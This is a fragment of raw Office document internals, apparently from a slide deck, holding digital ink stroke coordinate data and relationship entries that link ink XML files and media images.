0 0,-1-1 0,-11-5 0,-59-25 0,53 20 0,4 2 0,1 1 0,0 0 0,-30-20 0,54 30 0,1 0 0,-1-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,0 1 0,1-1 0,0 0 0,-1 1 0,1-1 0,-1 0 0,1 1 0,0-1 0,-1 0 0,1 0 0,0 0 0,0 1 0,1-1 0,-1 1 0,0 0 0,0-1 0,1 1 0,-1-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1 0 0,0-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,0-1 0,1 1 0,-1 0 0,1 0 0,0 0 0,34-3 0,-34 3 0,17-1 0,0 1 0,1 1 0,-1 1 0,0 1 0,0 0 0,0 1 0,25 10 0,0 3 0,64 16 0,-84-28 0,0-1 0,0 0 0,1-2 0,40-1 0,-53-3 0,0 0 0,0-1 0,-1 0 0,1 0 0,-1-1 0,0-1 0,14-7 0,-18 7 342,-12 4-2049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18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1 407 24575,'3'-1'0,"1"0"0,-1 0 0,0-1 0,0 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,2-4 0,8-5 0,22-13 0,2 1 0,46-21 0,-51 27 0,-1 2 0,1 2 0,0 1 0,58-14 0,102-8 0,-39 9 0,194-25 0,119 42 0,-309 9 0,324-18 0,-399 11 0,250-29 0,-274 26 0,91-2 0,58 12 0,-79 0 0,168 19 0,-154-7 0,-110-9 0,0 2 0,47 14 0,11 2 0,47-5 0,0 1 0,-55-7 0,152 1 0,-230-12 0,48 2 0,1 2 0,63 14 0,-13 12 0,-71-19 0,56 12 0,-45-13 0,-1 2 0,66 29 0,-23-9 0,175 42 0,-235-68 0,0 2 0,-1 0 0,0 2 0,0 1 0,-1 0 0,32 23 0,39 21 0,-49-30 0,-42-23 0,0 0 0,0 0 0,-1-1 0,1 0 0,0 1 0,0-1 0,0 0 0,1-1 0,-1 1 0,4 0 0,-7-1 0,1 0 0,-1 0 0,1 0 0,0-1 0,-1 1 0,1 0 0,-1 0 0,1 0 0,-1-1 0,1 1 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1-1 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1 1 0,1-1 0,0-1 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 0 0,0 0 0,0-3 0,-9-136 0,0-18 0,8 184 0,3 224 0,16-126 0,-17-122 0,-1 1 0,0-1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,-2 0 0,-6 1 0,0-1 0,0 0 0,0-1 0,-10-1 0,-2 0 0,-11 1 0,-138 2 0,168-1-124,-1 1 0,1-1 0,-1 1 0,1 0 0,-1 0 0,1 0-1,-1 0 1,1 0 0,0 0 0,-4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1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373 170 24575,'0'-2'0,"0"0"0,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 0 0,0 1 0,1-1 0,-1 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,-2-2 0,-22-18 0,15 14 0,-74-57 0,70 55 0,1 1 0,-1 0 0,-1 2 0,-25-10 0,33 14 0,-1 1 0,1 0 0,0 0 0,0 0 0,0 1 0,-1 0 0,-13 2 0,19-1 0,0-1 0,-1 0 0,1 1 0,0-1 0,-1 1 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 3 0,-10 70 0,3 0 0,3 1 0,9 125 0,6-126 333,1 15-2031,-11-74-5128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41:32.5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251 1 24575,'-4'0'0,"-1"0"0,1 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,1 0 0,-1 0 0,1 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,0 0 0,-4 8 0,-22 31 0,-54 93 0,70-113 0,6-11 0,0 0 0,1 0 0,0 1 0,1 0 0,0 0 0,-2 15 0,5-22 0,0-1 0,1 1 0,0-1 0,0 1 0,0 0 0,0-1 0,1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,1-1 0,0 0 0,0 0 0,4 6 0,-4-7 0,0 0 0,1 0 0,0 0 0,-1-1 0,1 1 0,0-1 0,0 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,1-1 0,-1 1 0,1-1 0,0 0 0,-1-1 0,1 1 0,0 0 0,5-1 0,1 1 85,1 1 1,-1 0-1,12 3 0,-11-2-654,-1 0 1,20 2-1,-19-5-6257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0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24575,'419'0'-1365,"-398"0"-5461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3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114 57 24575,'-8'-3'0,"1"0"0,-1 1 0,0 0 0,0 0 0,-1 1 0,1 0 0,0 0 0,-12 1 0,19 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,1-1 0,-1 0 0,0 1 0,1-1 0,-1 1 0,1-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,1 3 0,-1 0 0,0 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,4 4 0,2-2 0,0 0 0,0-1 0,1 0 0,-1-1 0,1 1 0,0-2 0,11 4 0,-6-2 0,-1 0 0,0-1 0,0-1 0,24 4 0,-32-7 0,1 1 0,0-1 0,-1 0 0,1 0 0,-1 0 0,1-1 0,0 0 0,-1 0 0,1-1 0,-1 1 0,8-4 0,-12 4 0,1 0 0,-1-1 0,1 1 0,-1-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,0-1 0,-1 0 0,1 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0-2 0,-3-50 0,0 28 0,3 16 0,0 5 0,0 0 0,0 0 0,0 0 0,-1 0 0,0 0 0,-3-9 0,4 12 0,-1 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1 1 0,0 0 0,1 0 0,-3 0 0,-128 1-1365,123-1-5461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5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24575,'20'58'0,"56"111"0,-62-151 0,-7-11 0,-7-7 0,0 0 0,1 0 0,-1 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,-1 1 0,1 0 0,0 0 0,0 0 0,0 0 0,-5-18 0,0 1 0,-1 0 0,-1 1 0,-11-20 0,-8-21 0,26 57 0,0-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,0 0 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1 1 0,1-2 0,0 2 0,0-1 0,0 0 0,0 0 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,2 0 0,45 1 0,-36 0 0,27-6 327,-8-1-2019,-20 6-5134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6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24575,'3'57'0,"3"0"0,17 77 0,-12-80 0,4 10 275,-10-47-603,0 0 0,-2 1 0,0-1 0,1 29 0,-4-37-6498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7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0 215 24575,'1'-3'0,"0"0"0,1 1 0,-1-1 0,0 0 0,1 1 0,-1 0 0,1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,3-2 0,1-2 0,26-27 0,-14 14 0,33-28 0,15-18-1365,-55 55-5461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8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24575,'93'63'0,"-59"-40"0,33 25 0,-44-29-455,0-1 0,33 19 0,-37-26-6371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29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24575,'-1'1'0,"0"1"0,-1-1 0,1 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 2 0,-2 8 0,-3 5 0,0 1 0,2 0 0,0 1 0,1-1 0,0 36 0,2-47 0,0 16 0,0 0 0,5 39 0,-3-56 0,0 0 0,1 1 0,-1-1 0,1 0 0,0 0 0,1 0 0,0 0 0,0 0 0,0-1 0,1 1 0,-1-1 0,1 0 0,1 0 0,5 6 0,4 1 88,6 7-814,36 24-1,-45-36-6099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0:31.1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24575,'6'0'0,"-1"1"0,1-1 0,-1 1 0,1 0 0,-1 0 0,1 0 0,-1 1 0,0 0 0,0 0 0,1 1 0,-2-1 0,1 1 0,0 0 0,0 0 0,-1 0 0,0 1 0,0 0 0,7 7 0,-1-1 0,0 1 0,0 0 0,-1 0 0,-1 0 0,0 1 0,-1 1 0,0-1 0,-1 1 0,0 1 0,-1-1 0,0 1 0,-1-1 0,-1 1 0,0 1 0,-1-1 0,-1 0 0,1 19 0,-2 29 0,-1 51 0,-1-104-1365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4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897 0 24575,'0'976'0,"-9"-832"0,6-116 0,3-23 0,-1 0 0,-1 0 0,1 1 0,-1-1 0,0 0 0,0 0 0,0-1 0,-1 1 0,0 0 0,0-1 0,0 1 0,0-1 0,-1 0 0,-7 7 0,6-7 0,-1 1 0,1-1 0,-1 0 0,0 0 0,0-1 0,0 0 0,-1 0 0,1 0 0,-1-1 0,-12 3 0,-128 29 0,140-33 0,1 1 0,-1-1 0,1 1 0,-1 1 0,1-1 0,0 1 0,-7 4 0,9-5 0,1 1 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,1 0 0,0 0 0,-3 6 0,1 1 0,0 0 0,1 0 0,0 0 0,1 0 0,0 0 0,0 15 0,3 72 0,1-39 0,-1-33 0,0-18 0,0 1 0,-1-1 0,-1 1 0,1-1 0,-4 15 0,4-21 0,-1-1 0,0 0 0,1 0 0,-1 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 0 0,1 0 0,-2 1 0,-31 0 0,24-2 0,-119-1 0,-138 2 0,265 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 1 0,1-1 0,-1 0 0,0 1 0,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 1 0,1-1 0,-2 2 0,3-1 0,-1-1 0,1 1 0,0 0 0,0-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,0-1 0,1 1 0,-1 0 0,1-1 0,0 1 0,-1-1 0,1 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,2 2 0,20 20 0,0 0 0,2-2 0,44 29 0,-13-9 0,-26-16 0,42 46 0,-28-26 0,39 31 0,21 23 0,-89-84 0,0 2 0,0-2 0,1 0 0,32 23 0,-47-38 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1 1 0,1-1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1-1 0,-1 1 0,1-1 0,-1 1 0,0-1 0,1 1 0,-1-1 0,0 0 0,0 0 0,0 1 0,1-1 0,-1 0 0,1-2 0,4-3 0,0 0 0,0-1 0,7-11 0,-7 10 0,9-15 0,-1 0 0,19-45 0,3-7 0,-28 62 0,1 1 0,1-1 0,0 2 0,12-12 0,-11 12 0,-1 0 0,0 0 0,-1-1 0,12-19 0,-3-1 0,-1-1 0,-1 0 0,-2-2 0,18-66 0,-31 93 0,0 5 0,0 1 0,-1 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,0 0 0,0-4 0,-1 5 0,1 0 0,0 1 0,-1-1 0,1 0 0,-1 0 0,1 1 0,-1-1 0,0 0 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1 0 0,0 1 0,0 0 0,1-1 0,-1 1 0,0-1 0,0 1 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,-1 0 0,-74-7 0,-102 3 0,145 4 0,-204 0-1365,227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18:55:09.3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24575,'1'4'0,"0"0"0,0 1 0,1-1 0,0 0 0,-1 0 0,1 0 0,0 0 0,1 0 0,3 4 0,1 5 0,25 40 0,49 61 0,-36-52 0,-30-40 0,-9-14 0,-1 1 0,2-1 0,-1 0 0,1 0 0,15 12 0,3-2 0,1-2 0,0 0 0,37 15 0,-46-24 0,0 2 0,-1 0 0,0 1 0,15 12 0,-24-16 0,0 0 0,0 1 0,-1-1 0,0 2 0,0-1 0,-1 1 0,0-1 0,0 1 0,6 16 0,-11-25 0,-1-1 0,1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 0 0,0 1 0,1-3 0,18-32 0,-4 7 0,-8 12 0,1 0 0,1 0 0,12-16 0,-17 26 0,1 0 0,0 0 0,0 1 0,1 0 0,0 0 0,0 0 0,0 1 0,15-8 0,7-6 0,-24 15 0,0 1 0,0-1 0,0 1 0,0 0 0,7-2 0,-4 2 0,-2 0 0,1-1 0,0 1 0,0-1 0,-1-1 0,0 1 0,0-1 0,0 0 0,-1 0 0,1-1 0,-1 0 0,-1 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,-1-1 0,0 0 0,0 0 0,3-15 0,-6 19 0,4-15 0,-1-1 0,-1 0 0,-1 0 0,0 0 0,-3-25 0,1 43 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,-2 0 0,-38-4 0,30 3 0,-68-3 0,0 3 0,-119 13 0,82 5 0,76-16 0,-45-3 0,35 0 0,49 2 0,0-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 1 0,0 0 0,1 0 0,0 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,0-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,1-1 0,-1 1 0,2 1 0,80 75 0,-16-16 0,-2 19 0,24-4 0,-85-73 0,0-1 0,1 0 0,-1 0 0,1 0 0,5 2 0,18 15 0,-27-19 0,0-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,0 0 0,0-1 0,1 1 0,-1-1 0,0 0 0,1 1 0,-1-1 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,3 0 0,-1-1 0,-1 0 0,1 0 0,0-1 0,-1 1 0,1 0 0,-1-1 0,1 0 0,-1 1 0,4-5 0,1-1 0,0-1 0,0-1 0,-1 1 0,8-15 0,-3 5 0,-1-1 0,-1 0 0,-1 0 0,-1-1 0,9-33 0,-15 49 0,1 0 0,0 0 0,-1 0 0,2 0 0,-1 1 0,0-1 0,1 1 0,0-1 0,-1 1 0,1 0 0,1 0 0,-1 0 0,0 1 0,1-1 0,4-2 0,-3 2 0,0-1 0,-1 1 0,0-1 0,1 0 0,-1 0 0,-1 0 0,6-7 0,-9 10 0,0 1 0,1 0 0,-1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,1 1 0,-1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,-1 1 0,1 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,0 0 0,-1-1 0,-13-4 0,-23 4 0,32 1 0,-91 2 0,-188-2 0,260 0 0,35 5 0,23 10 0,192 117 0,-225-132 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 0 0,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1 0 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1 0 0,-1-1 0,0 1 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 1 0,0-1 0,0 0 0,-1 0 0,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,-2 1 0,-4 1 0,0-1 0,0 1 0,0-1 0,-11 0 0,6-2 0,-1 0 0,1-1 0,0 0 0,-1-1 0,-11-5 0,-59-25 0,53 20 0,4 2 0,1 1 0,0 0 0,-30-20 0,54 30 0,1 0 0,-1-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,0 1 0,1-1 0,0 0 0,-1 1 0,1-1 0,-1 0 0,1 1 0,0-1 0,-1 0 0,1 0 0,0 0 0,0 1 0,1-1 0,-1 1 0,0 0 0,0-1 0,1 1 0,-1-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1 0 0,0-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,0-1 0,1 1 0,-1 0 0,1 0 0,0 0 0,34-3 0,-34 3 0,17-1 0,0 1 0,1 1 0,-1 1 0,0 1 0,0 0 0,0 1 0,25 10 0,0 3 0,64 16 0,-84-28 0,0-1 0,0 0 0,1-2 0,40-1 0,-53-3 0,0 0 0,0-1 0,-1 0 0,1 0 0,-1-1 0,0-1 0,14-7 0,-18 7 342,-12 4-2049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60.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image65.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png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62.png"/><Relationship Id="rId1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customXml" Target="../ink/ink59.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68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61.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink63.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink58.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.png"/><Relationship Id="rId22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70.xml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customXml" Target="../ink/ink74.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink67.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink72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69.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink66.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink71.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink75.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink73.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink68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80.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image74.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image78.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink84.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink77.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink82.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink86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79.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink76.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink81.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink85.xml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customXml" Target="../ink/ink83.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink78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8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customXml" Target="../ink/ink92.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image74.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink96.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink89.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75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customXml" Target="../ink/ink91.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png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28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink95.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink90.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink9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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image92.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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4.xml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3.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image102.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink105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103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02.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink109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2.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image105.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image100.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1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1.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image104.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink113.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image92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6.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image109.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1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13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12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink121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1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15.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image117.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink120.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink117.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink12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6.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image123.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image120.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink128.xml"/><Relationship Id="rId17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customXml" Target="../ink/ink1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5.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image122.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image119.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image124.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink127.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink124.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image121.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1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customXml" Target="../ink/ink1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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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3.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image128.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink13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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink134.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" 